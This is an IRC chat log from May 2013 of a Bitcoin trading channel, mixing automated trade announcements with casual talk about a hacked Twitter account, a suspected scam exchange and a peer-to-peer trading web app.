6600 @ 0.00068554 = 4.5246 BTC [-] May 26 18:02:01 [HAVELOCK] [ASICM] 1 @ 0.0248 BTC [+] May 26 18:04:57 [BTCTC] [BITVPS] 340 @ 0.000856 = 0.291 BTC [+] May 26 18:06:02 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [-] May 26 18:15:42 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 26 18:15:56 [BTCTC] [ASICMINER-PT] 3 @ 2.463 = 7.389 BTC [+] May 26 18:16:22 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 26 18:17:40 [BTCTC] [ASICMINER-PT] 1 @ 2.463 BTC [+] May 26 18:17:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.02499 = 0.2749 BTC [+] May 26 18:19:00 [HAVELOCK] [ASICM] 2 @ 0.02435 = 0.0487 BTC [-] May 26 18:21:01 [HAVELOCK] [ASICM] 1 @ 0.02489 BTC [+] May 26 18:22:05 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] May 26 18:22:32 [BTCTC] [ASICMINER-PT] 1 @ 2.43902 BTC [-] May 26 18:26:36 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] May 26 18:27:24 [BTCTC] [TAT.ASICMINER] 6 @ 0.02499 = 0.1499 BTC [+] May 26 18:28:52 [BTCTC] [TAT.ASICMINER] 40 @ 0.02499 = 0.9996 BTC [+] May 26 18:31:24 [BTCTC] [TAT.ASICMINER] 17 @ 0.02499 = 0.4248 BTC [+] May 26 18:35:32 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 26 18:46:02 [HAVELOCK] [ASICM] 28 @ 0.02435 = 0.6818 BTC [-] May 26 18:47:06 [BTCTC] [ASICMINER-PT] 1 @ 2.43903 BTC [+] May 26 18:48:02 [HAVELOCK] [ASICM] 22 @ 0.024253 = 0.5336 BTC [-] May 26 18:51:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.02499 = 0.05 BTC [+] May 26 18:52:43 [MPEX] [S.MPOE] 1843 @ 0.00068003 = 1.2533 BTC [-] May 26 19:01:07 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] May 26 19:06:21 [BTCTC] [S.DICE-PT] 3 @ 0.0033 = 0.0099 BTC [+] May 26 19:07:00 [BTCTC] [S.DICE-PT] 10 @ 0.00336 = 0.0336 BTC [+] May 26 19:07:56 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] May 26 19:11:22 [BTCTC] [BITVPS] 10 @ 0.000857 = 0.0086 BTC [+] May 26 19:12:00 [BTCTC] [CRYPTO-TRADE] 10 @ 0.19999 = 1.9999 BTC [-] May 26 19:12:02 [BTCTC] [CRYPTO-TRADE] 15 @ 0.2 = 3 BTC [+] May 26 19:15:02 [HAVELOCK] [ASICM] 1 @ 0.0248 BTC [+] May 26 19:17:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02461 BTC [-] May 26 19:19:36 [BTCTC] [TAT.ASICMINER] 22 @ 0.0246 = 0.5412 BTC [-] May 26 19:23:42 [BTCTC] [BITVPS] 3 @ 0.000858 = 0.0026 BTC [+] May 26 19:25:15 [MPEX] [S.MPOE] 9457 @ 0.00068003 = 6.431 BTC [-] May 26 19:25:17 [MPEX] [S.MPOE] 6943 @ 0.00068053 = 4.7249 BTC [+] May 26 19:26:09 [MPEX] [S.MPOE] 3857 @ 0.00068053 = 2.6248 BTC [+] May 26 19:27:21 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [-] May 26 19:28:01 [MPEX] [S.MPOE] 22543 @ 0.00068277 = 15.3917 BTC [+] May 26 19:31:37 https://krebsonsecurity.com/2013/05/reports-liberty-reserve-founder-arrested-site-shuttered/ May 26 19:33:20 heh... this has to be a hoax. Zimbabwe to make bitcoin the official national currency May 26 19:38:20 [BTCTC] [TAT.ASICMINER] 4 @ 0.02499 = 0.1 BTC [+] May 26 19:43:53 kinda old May 26 19:43:59 both of them May 26 19:45:58 [BTCTC] [S.BBET-PT] 1 @ 0.002 BTC [-] May 26 19:49:00 [HAVELOCK] [HIM] 1 @ 2.7499 BTC [+] May 26 19:52:01 [HAVELOCK] [ASICM] 22 @ 0.024799 = 0.5456 BTC [-] May 26 19:52:02 [HAVELOCK] [ASICM] 78 @ 0.024799 = 1.9343 BTC [-] May 26 19:54:22 [MPEX] [S.MPOE] 10000 @ 0.00068001 = 6.8001 BTC [-] May 26 19:56:19 [BTCTC] [BITVPS] 8 @ 0.000858 = 0.0069 BTC [+] May 26 19:56:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0245 BTC [-] May 26 19:56:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.02445 BTC [-] May 26 19:56:46 [BTCTC] [TAT.ASICMINER] 8 @ 0.02445 = 0.1956 BTC [-] May 26 19:57:33 [BTCTC] [CRYPTO-TRADE] 9 @ 0.2 = 1.8 BTC [+] May 26 19:59:40 [BTCTC] [CRYPTO-TRADE] 66 @ 0.2 = 13.2 BTC [+] May 26 20:00:02 [MPEX] [S.MPOE] 3070 @ 0.00068001 = 2.0876 BTC [-] May 26 20:00:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.02499 = 0.05 BTC [+] May 26 20:02:38 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 26 20:03:11 [BTCTC] [CRYPTO-TRADE] 6 @ 0.2 = 1.2 BTC [+] May 26 20:04:19 [BTCTC] [BTC-BOND] 20 @ 0.01035 = 0.207 BTC [+] May 26 20:08:01 [HAVELOCK] [ASICM] 2 @ 0.024799 = 0.0496 BTC [-] May 26 20:12:27 [BTCTC] [PAJKA.BOND] 1 @ 0.109989 BTC [+] May 26 20:12:39 [BTCTC] [PAJKA.BOND] 1 @ 0.109989 BTC [+] May 26 20:16:22 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 26 20:19:56 [BTCTC] [TAT.ASICMINER] 14 @ 0.024451 = 0.3423 BTC [-] May 26 20:22:44 [BTCTC] [BITVPS] 302 @ 0.000858 = 0.2591 BTC [+] May 26 20:24:20 [BTCTC] [S.DICE-PT] 7 @ 0.0033 = 0.0231 BTC [-] May 26 20:24:54 [BTCTC] [CRYPTO-TRADE] 245 @ 0.2 = 49 BTC [+] May 26 20:27:42 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 26 20:28:29 [BTCTC] [ASICMINER-PT] 1 @ 2.44151 BTC [+] May 26 20:28:49 [BTCTC] [ASICMINER-PT] 2 @ 2.4415 = 4.883 BTC [-] May 26 20:35:12 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 26 20:36:04 [BTCTC] [CRYPTO-TRADE] 20 @ 0.2 = 4 BTC [+] May 26 20:38:02 [BTCTC] [CRYPTO-TRADE] 6 @ 0.2 = 1.2 BTC [+] May 26 20:39:11 [BTCTC] [TAT.ASICMINER] 11 @ 0.0245 = 0.2695 BTC [+] May 26 20:42:05 [BTCTC] [COGNITIVE] 1 @ 0.310001 BTC [-] May 26 20:42:22 [BTCTC] [TAT.ASICMINER] 17 @ 0.0245 = 0.4165 BTC [+] May 26 20:42:30 Chaang-Noi: how so? May 26 20:42:38 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] May 26 20:43:42 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 26 20:45:40 i sent a skype out May 26 20:45:48 [BTCTC] [S.DICE-PT] 20 @ 0.0033 = 0.066 BTC [-] May 26 20:46:42 [BTCTC] [BITVPS] 2 @ 0.0009 = 0.0018 BTC [+] May 26 20:47:28 does seem awkward May 26 20:47:37 foundation just raised an assload of money from teh convention May 26 20:47:48 they dont need to be begging on twitter for bitcoins May 26 20:47:53 let alone for emergency May 26 20:51:15 also dropped an email, doesnt seem hes online tho May 26 20:52:52 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] May 26 20:53:02 [MPEX] [S.MPOE] 5574 @ 0.00068264 = 3.805 BTC [+] May 26 20:54:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.024988 BTC [+] May 26 20:54:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.024988 = 0.05 BTC [+] May 26 20:55:18 [BTCTC] [CRYPTO-TRADE] 21 @ 0.2 = 4.2 BTC [+] May 26 20:56:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0245 = 0.0735 BTC [-] May 26 20:57:11 ;;ticker May 26 20:57:11 BTCUSD ticker | Best bid: 134.96991, Best ask: 134.99999, Bid-ask spread: 0.03008, Last trade: 134.99999, 24 hour volume: 22590.00242669, 24 hour low: 130.01000, 24 hour high: 136.00000, 24 hour vwap: 133.58073 May 26 20:57:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 26 20:57:24 [BTCTC] [TAT.ASICMINER] 97 @ 0.024988 = 2.4238 BTC [+] May 26 20:58:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.02499 = 0.075 BTC [+] May 26 20:58:27 [BTCTC] [TAT.ASICMINER] 31 @ 0.02499 = 0.7747 BTC [+] May 26 21:00:22 https://images.4chan.org/pol/src/1369579480004.jpg May 26 21:03:15 [BTCTC] [CRYPTO-TRADE] 48 @ 0.2 = 9.6 BTC [+] May 26 21:04:01 some people testing their asics? May 26 21:09:18 [BTCTC] [ASICMINER-PT] 8 @ 2.45 = 19.6 BTC [+] May 26 21:09:57 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] May 26 21:10:51 [BTCTC] [ASICMINER-PT] 2 @ 2.45 = 4.9 BTC [+] May 26 21:11:35 [BTCTC] [ASICMINER-PT] 2 @ 2.455 = 4.91 BTC [+] May 26 21:16:37 [BTCTC] [ASICMINER-PT] 3 @ 2.45 = 7.35 BTC [-] May 26 21:26:23 [BTCTC] [ASICMINER-PT] 1 @ 2.445 BTC [-] May 26 21:26:25 [BTCTC] [ASICMINER-PT] 5 @ 2.444 = 12.22 BTC [-] May 26 21:26:27 [BTCTC] [ASICMINER-PT] 1 @ 2.443 BTC [-] May 26 21:37:54 [BTCTC] [S.DICE-PT] 10 @ 0.0033 = 0.033 BTC [-] May 26 21:42:44 [BTCTC] [ASICMINER-PT] 1 @ 2.449 BTC [+] May 26 21:44:37 [BTCTC] [ASICMINER-PT] 9 @ 2.449 = 22.041 BTC [+] May 26 21:45:09 [BTCTC] [ASICMINER-PT] 6 @ 2.444 = 14.664 BTC [-] May 26 21:47:25 [BTCTC] [BITVPS] 4 @ 0.000932 = 0.0037 BTC [+] May 26 21:57:55 [BTCTC] [ASICMINER-PT] 1 @ 2.4392 BTC [-] May 26 21:57:57 [BTCTC] [ASICMINER-PT] 1 @ 2.4391 BTC [-] May 26 21:57:59 [BTCTC] [ASICMINER-PT] 2 @ 2.43903 = 4.8781 BTC [-] May 26 21:58:02 [BTCTC] [ASICMINER-PT] 1 @ 2.43902 BTC [-] May 26 21:58:06 [BTCTC] [ASICMINER-PT] 2 @ 2.43902 = 4.878 BTC [-] May 26 21:58:09 [BTCTC] [ASICMINER-PT] 2 @ 2.438 = 4.876 BTC [-] May 26 21:58:10 [BTCTC] [ASICMINER-PT] 2 @ 2.43705 = 4.8741 BTC [-] May 26 21:58:12 [BTCTC] [ASICMINER-PT] 1 @ 2.43704 BTC [-] May 26 21:58:14 [BTCTC] [ASICMINER-PT] 1 @ 2.43703 BTC [-] May 26 21:58:16 [BTCTC] [ASICMINER-PT] 2 @ 2.43702 = 4.874 BTC [-] May 26 21:58:19 [BTCTC] [ASICMINER-PT] 3 @ 2.435 = 7.305 BTC [-] May 26 21:58:21 [BTCTC] [ASICMINER-PT] 1 @ 2.435 BTC [-] May 26 21:58:22 [BTCTC] [ASICMINER-PT] 1 @ 2.43 BTC [-] May 26 22:11:48 ;;ticker May 26 22:11:48 BTCUSD ticker | Best bid: 135.26999, Best ask: 135.27000, Bid-ask spread: 0.00001, Last trade: 135.26999, 24 hour volume: 21854.65149821, 24 hour low: 130.01000, 24 hour high: 136.00000, 24 hour vwap: 133.78015 May 26 22:12:13 $avg May 26 22:12:17 jurov: 132.68 May 26 22:13:44 [BTCTC] [CRYPTO-TRADE] 16 @ 0.2 = 3.2 BTC [+] May 26 22:14:13 [BTCTC] [BTC-BOND] 5 @ 0.01039 = 0.052 BTC [+] May 26 22:18:35 [BTCTC] [PAJKA.BOND] 2 @ 0.109989 = 0.22 BTC [+] May 26 22:24:52 http://seclists.org/fulldisclosure/2013/May/163 May 26 22:28:09 [BTCTC] [GSDPT] 1 @ 0.002724 BTC [-] May 26 22:29:52 [BTCTC] [GSDPT] 47 @ 0.002724 = 0.128 BTC [-] May 26 22:35:00 [HAVELOCK] [ASICM] 16 @ 0.02469 = 0.395 BTC [-] May 26 22:35:01 [HAVELOCK] [ASICM] 50 @ 0.02468 = 1.234 BTC [-] May 26 22:37:06 [BTCTC] [BTC-BOND] 950 @ 0.0104 = 9.88 BTC [+] May 26 22:37:35 [BTCTC] [S.DICE-PT] 200 @ 0.0033 = 0.66 BTC [-] May 26 22:39:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.02495 = 0.0749 BTC [-] May 26 22:42:39 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 26 22:44:44 [BTCTC] [TAT.ASICMINER] 5 @ 0.0249 = 0.1245 BTC [-] May 26 22:44:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.0249 = 0.1245 BTC [-] May 26 22:46:03 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [-] May 26 22:46:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.0249 = 0.249 BTC [-] May 26 22:48:21 [BTCTC] [CRYPTO-TRADE] 9 @ 0.1999 = 1.7991 BTC [-] May 26 22:50:53 [BTCTC] [CRYPTO-TRADE] 14 @ 0.2 = 2.8 BTC [+] May 26 22:51:54 [BTCTC] [GSDPT] 12 @ 0.002723 = 0.0327 BTC [-] May 26 22:51:59 [HAVELOCK] [ASICM] 2 @ 0.02469 = 0.0494 BTC [+] May 26 22:52:15 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 26 23:02:15 No worries I don't need that chan I own #btc-anal now May 26 23:02:26 so I'm good. May 26 23:06:37 [BTCTC] [BITVPS] 2 @ 0.000932 = 0.0019 BTC [+] May 26 23:12:24 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] May 26 23:16:17 [BTCTC] [PAJKA.BOND] 7 @ 0.109989 = 0.7699 BTC [+] May 26 23:17:00 [HAVELOCK] [HIM] 1 @ 2.75 BTC [+] May 26 23:32:44 lol May 26 23:32:53 I think Jon Matonis's twitter is hacked May 26 23:33:11 Jon Matonis ‏@jonmatonis 5m 2 bad Jon's wallet was encrypted :/ Expand Reply Retweet Favorite More Jon Matonis ‏@jonmatonis 16m Donate bitches <3: 14yMcPkqUVYrXFLwxJdSS34ae7reFmg5PJ Expand Jon Matonis ‏@jonmatonis 26m Jon, why are you ignoring me? O_o May 26 23:33:40 https://twitter.com/jonmatonis May 26 23:33:56 [BTCTC] [BASIC-MINING] 2 @ 0.5998 = 1.1996 BTC [-] May 26 23:34:40 [BTCTC] [BASIC-MINING] 3 @ 0.5999 = 1.7997 BTC [+] May 26 23:38:01 donations accually comming in https://blockchain.info/address/14yMcPkqUVYrXFLwxJdSS34ae7reFmg5PJ May 26 23:38:13 ftw May 26 23:38:21 lol... May 26 23:39:49 [BTCTC] [CRYPTO-TRADE] 23 @ 0.2 = 4.6 BTC [+] May 26 23:40:24 does crypto-trade work or not? lol May 26 23:40:38 this is really sad May 26 23:40:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.0249 = 0.1743 BTC [-] May 26 23:42:22 KRS-1: i own btcanal.com, where should i point it May 26 23:53:54 [BTCTC] [CRYPTO-TRADE] 75 @ 0.199 = 14.925 BTC [-] May 26 23:56:24 [BTCTC] [CRYPTO-TRADE] 35 @ 0.199 = 6.965 BTC [-] May 26 23:56:32 wat May 26 23:58:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.02456 BTC [-] May 26 23:58:18 [BTCTC] [TAT.ASICMINER] 92 @ 0.02455 = 2.2586 BTC [-] May 27 00:01:00 [HAVELOCK] [ASICM] 94 @ 0.0246 = 2.3124 BTC [-] May 27 00:03:54 [BTCTC] [TAT.ASICMINER] 3 @ 0.0249 = 0.0747 BTC [+] May 27 00:03:56 [BTCTC] [TAT.ASICMINER] 25 @ 0.02495 = 0.6238 BTC [+] May 27 00:04:59 [HAVELOCK] [ASICM] 31 @ 0.02451 = 0.7598 BTC [-] May 27 00:05:01 [HAVELOCK] [ASICM] 47 @ 0.0245 = 1.1515 BTC [-] May 27 00:05:41 [BTCTC] [GSDPT] 1 @ 0.002723 BTC [-] May 27 00:05:42 [BTCTC] [CRYPTO-TRADE] 13 @ 0.199 = 2.587 BTC [-] May 27 00:05:43 possible scam: http://www.bit4trader.com/ May 27 00:05:55 [BTCTC] [COGNITIVE] 4 @ 0.310004 = 1.24 BTC [+] May 27 00:05:55 http://shrani.si/f/2u/kA/3xsJFoHI/google.png May 27 00:06:01 [BTCTC] [COGNITIVE] 1 @ 0.310003 BTC [-] May 27 00:06:03 [BTCTC] [COGNITIVE] 2 @ 0.31 = 0.62 BTC [-] May 27 00:06:04 [BTCTC] [COGNITIVE] 4 @ 0.31 = 1.24 BTC [-] May 27 00:07:28 kako have you used this site May 27 00:07:47 see second link May 27 00:08:01 i signed up May 27 00:08:07 lol May 27 00:08:08 cant access anything May 27 00:08:19 ... May 27 00:08:20 [BTCTC] [S.MPOE-PT] 1 @ 0.00075 BTC [+] May 27 00:08:35 dayum May 27 00:08:53 kakobrekla: im assuming youre /not/ involved May 27 00:08:58 [MPEX] [S.MPOE] 11250 @ 0.00068354 = 7.6898 BTC [+] May 27 00:09:11 fiat500 i run bit4x May 27 00:09:18 KingCoin: why would you sign up when he just said its a scam lol May 27 00:09:29 kakobrekla: aaah, they copied the text May 27 00:09:31 lmfao May 27 00:09:35 to see whats in thete May 27 00:09:36 there May 27 00:09:54 hows the volume on bit4x May 27 00:10:00 apparently i run bit4trader too, was no aware till now! May 27 00:10:07 lol May 27 00:10:19 i got an account on btc.cx heard of that? May 27 00:10:34 you mean .sx? May 27 00:10:40 yeah' May 27 00:11:00 KingCoin, hold on a sec May 27 00:11:13 [MPEX] [S.MPOE] 1197 @ 0.00068354 = 0.8182 BTC [+] May 27 00:11:19 i havnt heard much about btc.sx so i dunno May 27 00:11:26 KingCoin READ https://bitcointalk.org/index.php?topic=188735.msg1955964#msg1955964 May 27 00:11:30 [BTCTC] [S.MPOE-PT] 1 @ 0.00075 BTC [+] May 27 00:11:39 not just first post. May 27 00:12:23 ahh so is that issue not resolved still? May 27 00:12:25 [BTCTC] [CRYPTO-TRADE] 2 @ 0.199 = 0.398 BTC [-] May 27 00:12:33 dont fuckin care they are idiots supreme May 27 00:12:36 what more do you want May 27 00:13:18 "kids with css skills that are learning their entrepreneurial skills on your teeth" May 27 00:13:30 lul May 27 00:13:40 sorry this went for bitstamp guys May 27 00:13:41 1 year rule wins again May 27 00:13:45 these guys dont even have css skills May 27 00:14:35 hehe May 27 00:14:52 dont fuckin open another bitstamp May 27 00:14:54 did you get your coins out? May 27 00:15:11 some change is still there May 27 00:15:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 27 00:24:38 [BTCTC] [S.DICE-PT] 19 @ 0.003001 = 0.057 BTC [-] May 27 00:24:40 [BTCTC] [S.DICE-PT] 50 @ 0.003001 = 0.1501 BTC [-] May 27 00:24:41 [BTCTC] [S.DICE-PT] 10 @ 0.003001 = 0.03 BTC [-] May 27 00:25:35 [BTCTC] [S.DICE-PT] 10 @ 0.003 = 0.03 BTC [-] May 27 00:25:39 [BTCTC] [S.DICE-PT] 3 @ 0.003 = 0.009 BTC [-] May 27 00:26:13 [BTCTC] [GSDPT] 88 @ 0.002723 = 0.2396 BTC [-] May 27 00:27:12 [BTCTC] [GSDPT] 13 @ 0.002724 = 0.0354 BTC [+] May 27 00:28:29 http://seclists.org/fulldisclosure/2013/May/163 May 27 00:30:34 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] May 27 00:32:32 kakobrekla: what up! May 27 00:32:42 o heya May 27 00:32:46 check out the site May 27 00:32:51 i think you will like the new features May 27 00:33:04 buttonwood.btcshares.com May 27 00:33:26 easy order updating, gox price as suggested value in order submission field May 27 00:33:31 better background and layout May 27 00:33:44 change order color based on owner May 27 00:33:59 mostly simple stuff, but some makes it a lot easier to use May 27 00:34:26 i also have a location stamp on every order (if allowed), and am working on a map view May 27 00:34:36 chekin it out May 27 00:34:48 interesting concept May 27 00:35:03 you have to start an account to see the features for real May 27 00:35:07 otherwise it may seem kinda boring May 27 00:35:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.02495 BTC [+] May 27 00:35:52 nice eh? May 27 00:35:55 very responsive May 27 00:36:01 mjr___ very nice May 27 00:36:02 indeed May 27 00:36:12 if you want to see it cool, pull it up on two separate devices May 27 00:36:21 so far what i've seen on wifi, sub second latency May 27 00:36:33 3G might suck though May 27 00:36:38 u know, its not necessary to have fancy gfx or art, i think if you just made it as simple as possible it would look best May 27 00:36:47 fancy graphics or art? May 27 00:36:54 glow effect etc May 27 00:36:57 thought this was as simple as possible May 27 00:36:59 ah ok May 27 00:37:11 that was just cuz of prior projects with tables May 27 00:37:14 what is it May 27 00:37:15 just white bg with times roman font would do really May 27 00:37:16 more work to take out than to leave May 27 00:37:20 ewww May 27 00:37:23 :P May 27 00:37:28 first off, i don't like serif fonts online May 27 00:37:32 fiat500: no. no no no no no May 27 00:37:34 harder to read than sans serif May 27 00:37:39 i like it mjr___ May 27 00:37:46 but what is it May 27 00:37:48 also, white background is worse for battery and harder to read in sunlight May 27 00:37:55 kakobrekla: thanks May 27 00:37:57 mjr___: i was kidding :P May 27 00:37:58 some realtime localbitcoins? May 27 00:38:07 Anduck: hold on, read this May 27 00:38:26 http://dealbook.nytimes.com/2013/05/06/a-push-for-a-bitcoin-buttonwood/ May 27 00:38:34 that is its first and primary use case May 27 00:38:34 mjr___: some people seem to think it is appropriate *cough* mpex May 27 00:38:38 mjr___ it asked me to access my geolocation but that has no implication at this point? May 27 00:38:48 kakobrekla: well...none that you can see May 27 00:38:55 but each order is tagged with a loction May 27 00:38:56 mkay May 27 00:38:57 loctoin May 27 00:38:59 location May 27 00:39:07 why? May 27 00:39:08 might want to show this along in the table? May 27 00:39:09 ok ty May 27 00:39:10 ... May 27 00:39:19 to display on a map May 27 00:39:25 cool May 27 00:39:27 my whole thing is decentralized exchanges May 27 00:39:34 based on cash in person transactions May 27 00:39:37 specifically groups May 27 00:39:47 [BTCTC] [BASIC-MINING] 1 @ 0.570101 BTC [-] May 27 00:39:55 i will have more advanced order types set up soon May 27 00:39:59 as well as API access etc May 27 00:40:08 ah, neat May 27 00:40:09 bitinstant has already expressed interest, as well as coinapult May 27 00:40:20 but i want to offer different clearing methods and filters May 27 00:40:32 the guys from mycelium have a perfect integration with this May 27 00:40:40 mjr___: lemme know when API is up, im building an aggregator and this would be cool to list May 27 00:40:49 soon, you will be able to alert users that you wish to trade May 27 00:40:53 profile pics May 27 00:40:56 btc addresses May 27 00:41:02 then we build escrow on top, etc May 27 00:41:14 also rating system, perhaps linked to WoT May 27 00:41:38 [BTCTC] [ASICMINER-PT] 2 @ 2.4599 = 4.9198 BTC [+] May 27 00:41:40 [BTCTC] [ASICMINER-PT] 8 @ 2.46 = 19.68 BTC [+] May 27 00:41:51 eventually would like to have a "troll box" as well as person to person messaging, push notifications, email, twitter and sms May 27 00:41:53 but for an in-person exchange, isnt the price going to change by the time the two people meet? May 27 00:42:08 that is part of the reason why very easy to update orders May 27 00:42:14 but for what we will do tomorrow May 27 00:42:21 we will all be in union square park May 27 00:42:27 haha May 27 00:42:30 so this just keeps order book organized so everyone knows prices May 27 00:42:46 i also put in gox price upon page load to give people reference without having to switch page May 27 00:43:01 http://shrani.si/f/2H/On/K8u8STQ/ssquare.png May 27 00:43:06 fiat500 ^^ May 27 00:43:19 oh cool May 27 00:43:49 people may even start using "square" or other cell phone based cc systems to transact May 27 00:44:02 they want to roll it out in berlin, sydney, paris and san fran May 27 00:44:15 i think WoT members will be able to cross link all exchanges May 27 00:44:19 acting as brokers May 27 00:44:20 mjr can you code iphone apps? May 27 00:44:31 KingCoin: hmmm...depends on how deep you mean May 27 00:44:40 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] May 27 00:44:45 KingCoin: iphone apps can be incredibly easy...or incredibly hard May 27 00:44:50 look up phonegap May 27 00:44:53 mjr___: theres no financial incentive for you to maintain this, so what happens next year when work piles up in your day job? May 27 00:44:53 i can do that easy May 27 00:44:55 i have an idea for a bitcoin app May 27 00:45:06 lol iphone is evil May 27 00:45:07 utilizing geo location May 27 00:45:08 fiat500: LOL, um...angel investors already flocking May 27 00:45:10 mostly May 27 00:45:32 fiat500: instagram, pinterest, tumblr...fuck even twitter May 27 00:45:44 [BTCTC] [BASIC-MINING] 1 @ 0.570101 BTC [-] May 27 00:45:46 what is there monetization model? does it support a billion dollar valuation? May 27 00:45:53 its about users May 27 00:46:01 we may do adds on the location aware features May 27 00:46:04 some rev share deals May 27 00:46:13 but those are going to be on top of a free and open source layer May 27 00:46:30 people need an easy way to see locally what is for sale and to meetup in groups to trade bitcoins May 27 00:46:40 i think most people will make money as brokers May 27 00:46:47 but there is other ways also May 27 00:46:48 escrow May 27 00:47:07 always think of girls wheni hear escrow May 27 00:47:12 whys that? May 27 00:47:23 dun worry, is a good thing May 27 00:47:33 im just curious the correlation May 27 00:47:42 fiat500: but also, this is what is fun to me May 27 00:47:57 i built this thing from scratch, and i plan on making it the coolest web app in the bitcoin space May 27 00:48:04 obviously LONG way to go May 27 00:48:17 KingCoin: and yes, I see an android and iphone app in our future May 27 00:48:20 mjr___: i love writing iphone software and frameworks for instance, but every once in a while i find myself losing motivation May 27 00:48:25 even when theres money on the table May 27 00:48:47 im talking to someone about developing an iphone app May 27 00:48:48 fiat500: well, the key is to get a strong interest early (financial times article coming out early June) and then get money to hire others May 27 00:49:01 mjr___: good luck getting an ios app for this on the app store, no transactions involving btc allowed for now May 27 00:49:11 jesus fuck people May 27 00:49:11 yeah.. thats whats holding me back May 27 00:49:16 its a fuckin webapp May 27 00:49:17 fiat500: maintain your vision, without having to actually do all of it May 27 00:49:19 [BTCTC] [TAT.ASICMINER] 14 @ 0.02489 = 0.3485 BTC [-] May 27 00:49:19 the eonly way to go May 27 00:49:21 but the first part of the app will be free May 27 00:49:28 web based and iphone May 27 00:49:29 kakobrekla: um...exactly, its all free right now and only info May 27 00:49:36 you dont need platform dedicated sw May 27 00:49:39 any of you May 27 00:49:41 . May 27 00:49:41 yes May 27 00:49:41 are you making one kingcoin? May 27 00:49:42 true May 27 00:49:48 and we aren't holding or sending money May 27 00:49:56 so no transactions = no hassle from apple i hope May 27 00:49:59 THOUGH May 27 00:50:02 kakobrekla: yeah, they dont May 27 00:50:09 yeah i want to im trying to find a partner for the project locally May 27 00:50:10 check out gliph May 27 00:50:13 on iOS store May 27 00:50:19 KingCoin: where is locally? May 27 00:50:26 toronto canada May 27 00:50:28 i'm looking to pay for an app May 27 00:50:28 mjr___: glyph is the only exception :P May 27 00:50:29 you can send bitcoins through gliph May 27 00:50:43 more to do with analysing May 27 00:50:56 mjr_: so how did they get an exception (the fact that there is an exception almost guarantees there can be more than one) May 27 00:51:06 mjr___: Are u doing local exchanges because electronic ones will be shut down / regulated? May 27 00:51:06 mjr___: coinbase couldnt get it May 27 00:51:22 probably the most legit btc-related company out there right now May 27 00:51:34 just saying, focus on webapp for now May 27 00:51:34 bitbuyer_m: yes, exactly, and even if they weren't...for most non investor enterprise people, the process is too much bother May 27 00:51:39 fiat500: yeah for suree May 27 00:51:40 coinbase is fuckin lame May 27 00:51:51 and certanly not 'most legit biz' May 27 00:52:00 kakobrekla: you are jaded, new coinbase is new May 27 00:52:17 and i havent found an easier way to get btc in/out of my US bank acct yet May 27 00:52:22 these are the problems: 1. 10 days verification? 2. Wire transfer taking days and costing a lot 3. Counter Party risk (legal, professional) May 27 00:52:48 i guarantee that if you are in NYC, there is no easier way to get a bitcoin than by showing up on monday and handing cash May 27 00:52:57 0 robberies or scams May 27 00:53:05 and instant May 27 00:53:09 i dont want to get out of my pajamas to buy btc :P May 27 00:53:23 fiat500: well...to each their own May 27 00:53:36 haha May 27 00:53:39 but i think i'd rather get out of bed at 5pm than to wait almost 2 weeks for gox May 27 00:53:50 and coinbase can take over a month when starting out to get limits up May 27 00:54:04 10btc per day is reasonable May 27 00:54:07 anyway coinbase isnt competition May 27 00:54:23 point is, most people just want to buy something the way they buy anything else, by handing cash and receiving what they wanted May 27 00:54:34 i think your direct competition is otc and localbitcoins May 27 00:54:51 legal counsel (talked to 3 including Patrick Murk from bitcoin foundation) said that individuals will not fall under fincen May 27 00:55:08 fiat500: yeah...but localbitcoins is not very active, and i'm the opposite of OTC May 27 00:55:20 UTC? :P May 27 00:55:30 P2P May 27 00:55:32 irl May 27 00:55:51 [BTCTC] [BITVPS] 100 @ 0.0008 = 0.08 BTC [-] May 27 00:55:51 problem with localbitcoins is the sketchiness factor of one on one meetup May 27 00:55:52 [BTCTC] [CRYPTO-TRADE] 3 @ 0.2 = 0.6 BTC [+] May 27 00:55:59 figuring out times and places May 27 00:56:13 groups who meet at fixed times and places have huge advantage over that May 27 00:56:38 point is, if you see a 